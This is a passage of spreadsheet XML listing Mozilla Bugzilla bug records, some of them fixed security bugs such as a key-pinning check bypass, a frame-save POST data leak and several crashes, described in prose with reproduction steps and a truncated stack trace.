      </c>
    </row>
    <row r="295">
      <c r="A295" t="n">
        <v>1559146</v>
      </c>
      <c r="B295" t="inlineStr">
        <is>
          <t>2019-06-13 07:11:26 -0700</t>
        </is>
      </c>
      <c r="C295" t="inlineStr">
        <is>
          <t>Pagination from bottom page disappears</t>
        </is>
      </c>
      <c r="D295" t="inlineStr">
        <is>
          <t>2019-06-14 14:29:08 -0700</t>
        </is>
      </c>
      <c r="E295" t="n">
        <v>1</v>
      </c>
      <c r="F295" t="n">
        <v>1</v>
      </c>
      <c r="G295" t="n">
        <v>7</v>
      </c>
      <c r="H295" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I295" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J295" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K295" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L295" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M295" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N295" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P295" t="inlineStr"/>
      <c r="Q295" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R295" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S295" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T295" t="n">
        <v>1</v>
      </c>
      <c r="U295" t="n">
        <v>0</v>
      </c>
      <c r="V295" t="n">
        <v>3</v>
      </c>
      <c r="W295" t="inlineStr">
        <is>
          <t>STR
1. Go to [this sample link](https://treeherder.mozilla.org/perf.html#/alerts?status=6&amp;framework=6&amp;hideDwnToInv=1)
2. Go to the pagination from bottom of page
3. Click on the last number *(right before the right-wise chevron)*
Expected result:
New page displays an updated pagination
What happens instead:
Entire pagination disappears.
This is a consistent bug, as it reproduces for other test frameworks as well.</t>
        </is>
      </c>
      <c r="X295" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" t="n">
        <v>321230</v>
      </c>
      <c r="B296" t="inlineStr">
        <is>
          <t>2005-12-22 07:35:23 -0800</t>
        </is>
      </c>
      <c r="C296" t="inlineStr">
        <is>
          <t>Don't link to libdl on BeOS</t>
        </is>
      </c>
      <c r="D296" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E296" t="n">
        <v>1</v>
      </c>
      <c r="F296" t="n">
        <v>1</v>
      </c>
      <c r="G296" t="n">
        <v>7</v>
      </c>
      <c r="H296" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I296" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J296" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K296" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L296" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M296" t="inlineStr">
        <is>
          <t>BeOS</t>
        </is>
      </c>
      <c r="N296" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P296" t="inlineStr"/>
      <c r="Q296" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R296" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S296" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T296" t="n">
        <v>1</v>
      </c>
      <c r="U296" t="n">
        <v>0</v>
      </c>
      <c r="V296" t="n">
        <v>14</v>
      </c>
      <c r="W296" t="inlineStr">
        <is>
          <t>NSPR uses native functions for that; the libdl dependency is not necessary.</t>
        </is>
      </c>
      <c r="X296" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" t="n">
        <v>471962</v>
      </c>
      <c r="B297" t="inlineStr">
        <is>
          <t>2009-01-03 06:12:29 -0800</t>
        </is>
      </c>
      <c r="C297" t="inlineStr">
        <is>
          <t>When saving an inner frame as file only, the POST data of the outer page is sent to the address of the inner page</t>
        </is>
      </c>
      <c r="D297" t="inlineStr">
        <is>
          <t>2009-12-19 19:24:31 -0800</t>
        </is>
      </c>
      <c r="E297" t="n">
        <v>1</v>
      </c>
      <c r="F297" t="n">
        <v>1</v>
      </c>
      <c r="G297" t="n">
        <v>3</v>
      </c>
      <c r="H297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I297" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J297" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K297" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O297" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P297" t="inlineStr">
        <is>
          <t>[sg:low] [1.8.1 fix in 484621]</t>
        </is>
      </c>
      <c r="Q297" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R297" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S297" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T297" t="n">
        <v>1</v>
      </c>
      <c r="U297" t="n">
        <v>0</v>
      </c>
      <c r="V297" t="n">
        <v>89</v>
      </c>
      <c r="W297" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
When saving an inner frame as file only (not as a complete web page), the POST data of the outer page is incorrectly sent to the address of the inner frame.
I've not tested the case explicitly, but in "toolkit/conten/contentAreaUtils.js"
it seems that the POST data is attached even if the page displayed in the frame
is from a different domain. This could cause the POST data to be available to
the inner site even if not originally intended by the author of the outer page.
Because of this concern I've marked this bug with the security flag, even if
this kind of data leak is quite unlikely in a real situation.
Reproducible: Always
Steps to Reproduce:
I tested this with the POW extension and the attached files.
1. Install POW (http://davidkellogg.com/wiki/Main_Page)
2. Copy the attached files to web server's root directory
3. Navigate to http://127.0.0.1:6670/test-post.sjs
4. Type "Outer" in the upper textbox and click "Submit Query" nearby.
5. Type "Inner" in the lower textbox and click "Submit Query" nearby.
6. Right click inside the inner frame, select "This Frame", "Save Frame As...".
7. Select "Web Page, HTML only" and save the page.
8. Open the saved page.
Actual Results:  
You will see "Inner input: Outer".
Expected Results:  
You should have seen "Inner input: Inner".</t>
        </is>
      </c>
      <c r="X297" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" t="n">
        <v>1147497</v>
      </c>
      <c r="B298" t="inlineStr">
        <is>
          <t>2015-03-25 10:33:18 -0700</t>
        </is>
      </c>
      <c r="C298" t="inlineStr">
        <is>
          <t>key pinning checks for overridable errors do not work as intended by default</t>
        </is>
      </c>
      <c r="D298" t="inlineStr">
        <is>
          <t>2015-07-09 00:40:49 -0700</t>
        </is>
      </c>
      <c r="E298" t="n">
        <v>1</v>
      </c>
      <c r="F298" t="n">
        <v>1</v>
      </c>
      <c r="G298" t="n">
        <v>3</v>
      </c>
      <c r="H298" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I298" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J298" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K298" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N298" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P298" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q298" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S298" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T298" t="n">
        <v>1</v>
      </c>
      <c r="U298" t="n">
        <v>0</v>
      </c>
      <c r="V298" t="n">
        <v>42</v>
      </c>
      <c r="W298" t="inlineStr">
        <is>
          <t>In bug 1066190, we discovered that encountering an overridable certificate error could cause pinning checks to be skipped. So, if building a trusted chain failed in CertVerifier::VerifyCert, we made sure that we called CertListContainsExpectedKeys to do pinning checks. CertListContainsExpectedKeys expects a chain of certificates ending in a trusted root. The default pinning setting is to skip the checks if the root isn't a built-in root. In VerifyCert, if building a chain failed, we don't have a chain - we just pass the certificate itself to CertListContainsExpectedKeys. This does the built-in root check on that certificate, which almost certainly won't be a built-in. So, we skip the pinning checks and use the original error, which would allow overrides.</t>
        </is>
      </c>
      <c r="X298" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" t="n">
        <v>1637112</v>
      </c>
      <c r="B299" t="inlineStr">
        <is>
          <t>2020-05-11 16:30:01 -0700</t>
        </is>
      </c>
      <c r="C299" t="inlineStr">
        <is>
          <t>'border-image' rendering is broken in WebRender</t>
        </is>
      </c>
      <c r="D299" t="inlineStr">
        <is>
          <t>2021-09-01 00:05:48 -0700</t>
        </is>
      </c>
      <c r="E299" t="n">
        <v>1</v>
      </c>
      <c r="F299" t="n">
        <v>1</v>
      </c>
      <c r="G299" t="n">
        <v>3</v>
      </c>
      <c r="H299" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I299" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J299" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K299" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L299" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M299" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N299" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P299" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main77+]</t>
        </is>
      </c>
      <c r="Q299" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R299" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S299" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T299" t="n">
        <v>1</v>
      </c>
      <c r="U299" t="n">
        <v>0</v>
      </c>
      <c r="V299" t="n">
        <v>26</v>
      </c>
      <c r="W299" t="inlineStr">
        <is>
          <t>Created attachment 9147446
Testcase
The test works correctly in Firefox v76 and Chrome v81.</t>
        </is>
      </c>
      <c r="X299" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" t="n">
        <v>694953</v>
      </c>
      <c r="B300" t="inlineStr">
        <is>
          <t>2011-10-17 05:15:26 -0700</t>
        </is>
      </c>
      <c r="C300" t="inlineStr">
        <is>
          <t>Crash [@ nsAString_internal::EqualsASCII ] with &lt;svg:mpath&gt; linking to a non-SVG element</t>
        </is>
      </c>
      <c r="D300" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:43 -0700</t>
        </is>
      </c>
      <c r="E300" t="n">
        <v>1</v>
      </c>
      <c r="F300" t="n">
        <v>1</v>
      </c>
      <c r="G300" t="n">
        <v>3</v>
      </c>
      <c r="H300" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I300" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J300" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K300" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L300" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M300" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N300" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P300" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q300" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R300" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S300" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T300" t="n">
        <v>1</v>
      </c>
      <c r="U300" t="n">
        <v>0</v>
      </c>
      <c r="V300" t="n">
        <v>20</v>
      </c>
      <c r="W300" t="inlineStr">
        <is>
          <t>Created attachment 567424
Input to trigger the crash.
The attached SVG file causes a nasty looking crash at least in Firefox 8.0. I haven't tested with other versions yet. The original file crashed at 0x4, but the address moved while looking for a simpler triggering file and ended up at 0xff000004. High crash addresses often imply security impact, so reporting this as a security bug to be on the safe side.
Crash report: https://crash-stats.mozilla.com/report/index/bp-72d7c90a-2029-4ec7-9a66-1deca2111017</t>
        </is>
      </c>
      <c r="X300" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" t="n">
        <v>946351</v>
      </c>
      <c r="B301" t="inlineStr">
        <is>
          <t>2013-12-04 10:55:01 -0800</t>
        </is>
      </c>
      <c r="C301" t="inlineStr">
        <is>
          <t>Misissued Google certificates from DCSSI</t>
        </is>
      </c>
      <c r="D301" t="inlineStr">
        <is>
          <t>2014-03-05 12:21:12 -0800</t>
        </is>
      </c>
      <c r="E301" t="n">
        <v>1</v>
      </c>
      <c r="F301" t="n">
        <v>1</v>
      </c>
      <c r="G301" t="n">
        <v>3</v>
      </c>
      <c r="H301" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I301" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J301" t="inlineStr">
        <is>
          <t>CA Certificates Code</t>
        </is>
      </c>
      <c r="K301" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M301" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N301" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P301" t="inlineStr">
        <is>
          <t>[adv-main26+][adv-esr24.2+]</t>
        </is>
      </c>
      <c r="Q301" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R301" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S301" t="inlineStr">
        <is>
          <t>3.15.3.1</t>
        </is>
      </c>
      <c r="T301" t="n">
        <v>1</v>
      </c>
      <c r="U301" t="n">
        <v>0</v>
      </c>
      <c r="V301" t="n">
        <v>68</v>
      </c>
      <c r="W301" t="inlineStr">
        <is>
          <t>Created attachment 8342520
dcssi-gstatic-chain</t>
        </is>
      </c>
      <c r="X301" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" t="n">
        <v>904718</v>
      </c>
      <c r="B302" t="inlineStr">
        <is>
          <t>2013-08-13 10:54:00 -0700</t>
        </is>
      </c>
      <c r="C302" t="inlineStr">
        <is>
          <t>Create dev rabbitmq setup</t>
        </is>
      </c>
      <c r="D302" t="inlineStr">
        <is>
          <t>2016-07-25 14:18:01 -0700</t>
        </is>
      </c>
      <c r="E302" t="n">
        <v>1</v>
      </c>
      <c r="F302" t="n">
        <v>1</v>
      </c>
      <c r="G302" t="n">
        <v>6</v>
      </c>
      <c r="H302" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I302" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J302" t="inlineStr">
        <is>
          <t>WebOps: Socorro</t>
        </is>
      </c>
      <c r="K302" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L302" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M302" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N302" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P302" t="inlineStr"/>
      <c r="Q302" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R302" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S302" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T302" t="n">
        <v>1</v>
      </c>
      <c r="U302" t="n">
        <v>0</v>
      </c>
      <c r="V302" t="n">
        <v>5</v>
      </c>
      <c r="W302" t="inlineStr">
        <is>
          <t>Need dev rabbitmq setup for testing
* virtualhost
* username
* password</t>
        </is>
      </c>
      <c r="X302" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" t="n">
        <v>816994</v>
      </c>
      <c r="B303" t="inlineStr">
        <is>
          <t>2012-11-30 07:57:10 -0800</t>
        </is>
      </c>
      <c r="C303" t="inlineStr">
        <is>
          <t>Opus crash due to race [@opus_multistream_decode_native]</t>
        </is>
      </c>
      <c r="D303" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:06 -0700</t>
        </is>
      </c>
      <c r="E303" t="n">
        <v>1</v>
      </c>
      <c r="F303" t="n">
        <v>1</v>
      </c>
      <c r="G303" t="n">
        <v>3</v>
      </c>
      <c r="H303" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I303" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J303" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K303" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L303" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M303" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N303" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O303" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P303" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q303" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R303" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S303" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T303" t="n">
        <v>1</v>
      </c>
      <c r="U303" t="n">
        <v>0</v>
      </c>
      <c r="V303" t="n">
        <v>60</v>
      </c>
      <c r="W303" t="inlineStr">
        <is>
          <t>Created attachment 687099
testcase
I am guessing that this crash is triggered by a race condition inside the media decoder state machine. To reproduce reload the testcase with cmd+r or f5 a few times. The crashing location will vary on each execution.
Tested with changeset: 114362:c63d5cff18ba</t>
        </is>
      </c>
      <c r="X303" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" t="n">
        <v>1448428</v>
      </c>
      <c r="B304" t="inlineStr">
        <is>
          <t>2018-03-23 11:27:23 -0700</t>
        </is>
      </c>
      <c r="C304" t="inlineStr">
        <is>
          <t>Split generated JNI wrappers into multiple .h and .cpp files</t>
        </is>
      </c>
      <c r="D304" t="inlineStr">
        <is>
          <t>2020-05-19 15:59:09 -0700</t>
        </is>
      </c>
      <c r="E304" t="n">
        <v>1</v>
      </c>
      <c r="F304" t="n">
        <v>1</v>
      </c>
      <c r="G304" t="n">
        <v>7</v>
      </c>
      <c r="H304" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I304" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J304" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K304" t="inlineStr">
        <is>
          <t>3 Branch</t>
        </is>
      </c>
      <c r="L304" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M304" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N304" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O304" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P304" t="inlineStr">
        <is>
          <t>[geckoview:p3][geckoview:m78]</t>
        </is>
      </c>
      <c r="Q304" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R304" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S304" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T304" t="n">
        <v>1</v>
      </c>
      <c r="U304" t="n">
        <v>0</v>
      </c>
      <c r="V304" t="n">
        <v>23</v>
      </c>
      <c r="W304" t="inlineStr">
        <is>
          <t>I have patches in progress to generate the JNI wrappers from the (compiled) Java code rather than checking generated artifacts into the tree.  While testing, I notice that any change to the wrappers triggers a fairly significant |mach build binaries| cycle, since the places that include "GeneratedJNIWrappers.h" have grown significantly since inception.
One way that we might improve this is to make the wrapper generation produce multiple .h and .cpp files, name them in some standard way, and then achieve an "include what you use" win when editing the wrappers.
Since we have ~300 WrapForJNI uses in the tree right now, it's worth pursuing this sooner rather than later, I think.</t>
        </is>
      </c>
      <c r="X304" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" t="n">
        <v>534082</v>
      </c>
      <c r="B305" t="inlineStr">
        <is>
          <t>2009-12-10 16:24:14 -0800</t>
        </is>
      </c>
      <c r="C305" t="inlineStr">
        <is>
          <t>Crash at Wikipedia with -moz-column and list-item [@ nsLineBox::MarkDirty()] [@ nsBlockFrame::DoRemoveFrame(nsIFrame*, unsigned int)]</t>
        </is>
      </c>
      <c r="D305" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E305" t="n">
        <v>1</v>
      </c>
      <c r="F305" t="n">
        <v>1</v>
      </c>
      <c r="G305" t="n">
        <v>3</v>
      </c>
      <c r="H305" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I305" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J305" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K305" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L305" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M305" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N305" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O305" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P305" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q305" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R305" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S305" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T305" t="n">
        <v>1</v>
      </c>
      <c r="U305" t="n">
        <v>0</v>
      </c>
      <c r="V305" t="n">
        <v>33</v>
      </c>
      <c r="W305" t="inlineStr">
        <is>
          <t>1. http://en.wikipedia.org/wiki/Special:Search?search=house
2. crash 1.9.3 but not 1.9.2
+		this	0xdddddddd {mFirstChild=??? mBounds={...} mAscent=??? ...}	nsLineBox * const
&gt;	gklayout.dll!nsLineBox::MarkDirty()  Line 252 + 0x3 bytes	C++
 	gklayout.dll!nsBlockFrame::DoRemoveFrame(nsIFrame * aDeletedFrame=0x00000000, unsigned int aFlags=0)  Line 5406	C++
 	gklayout.dll!RemoveBlockChild(nsIFrame * aFrame=0x0915d560, int aRemoveOnlyFluidContinuations=1)  Line 5183	C++
 	gklayout.dll!nsBlockFrame::DoRemoveFrame(nsIFrame * aDeletedFrame=0x0915d560, unsigned int aFlags=0)  Line 5414 + 0x17 bytes	C++
 	gklayout.dll!nsBlockFrame::DeleteNextInFlowChild(nsPresContext * aPresContext=0x05bf97a0, nsIFrame * aNextInFlow=0x0915d468, int aDeletingEmptyFrames=1)  Line 5532	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=0, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=1, nsLineBox * aLine=0x0953a7d0, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 359	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012a0cc)  Line 3115 + 0x45 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012a0cc)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=3)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsContainerFrame::ReflowChild(nsIFrame * aKidFrame=0x0915d400, nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, int aX=9242, int aY=0, unsigned int aFlags=0, unsigned int &amp; aStatus=3, nsOverflowContinuationTracker * aTracker=0x00000000)  Line 774 + 0x21 bytes	C++
 	gklayout.dll!nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=3, const nsColumnSetFrame::ReflowConfig &amp; aConfig={...}, int aUnboundedLastColumn=0, nsCollapsingMargin * aBottomMarginCarriedOut=0x0012a794, nsColumnSetFrame::ColumnBalanceData &amp; aColData={...})  Line 675	C++
 	gklayout.dll!nsColumnSetFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aDesiredSize={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=3)  Line 1035 + 0x22 bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=1, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=0, nsLineBox * aLine=0x08bcd480, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=3, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012af14)  Line 3115 + 0x45 bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowLine(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012af14)  Line 2384 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowDirtyLines(nsBlockReflowState &amp; aState={...})  Line 1885 + 0x1b bytes	C++
 	gklayout.dll!nsBlockFrame::Reflow(nsPresContext * aPresContext=0x05bf97a0, nsHTMLReflowMetrics &amp; aMetrics={...}, const nsHTMLReflowState &amp; aReflowState={...}, unsigned int &amp; aStatus=0)  Line 993 + 0xf bytes	C++
 	gklayout.dll!nsBlockReflowContext::ReflowBlock(const nsRect &amp; aSpace={...}, int aApplyTopMargin=1, nsCollapsingMargin &amp; aPrevMargin={...}, int aClearance=0, int aIsAdjacentWithTop=0, nsLineBox * aLine=0x089eba88, nsHTMLReflowState &amp; aFrameRS={...}, unsigned int &amp; aFrameReflowStatus=0, nsBlockReflowState &amp; aState={...})  Line 310 + 0x2c bytes	C++
 	gklayout.dll!nsBlockFrame::ReflowBlockFrame(nsBlockReflowState &amp; aState={...}, nsLineList_iterator aLine={...}, int * aKeepReflowGoing=0x0012ba2c)  Line 3115 + 0x45 bytes	C++
